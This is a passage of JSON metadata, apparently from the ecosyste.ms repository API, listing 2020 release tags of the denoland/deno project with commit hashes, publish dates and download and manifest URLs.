Hub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2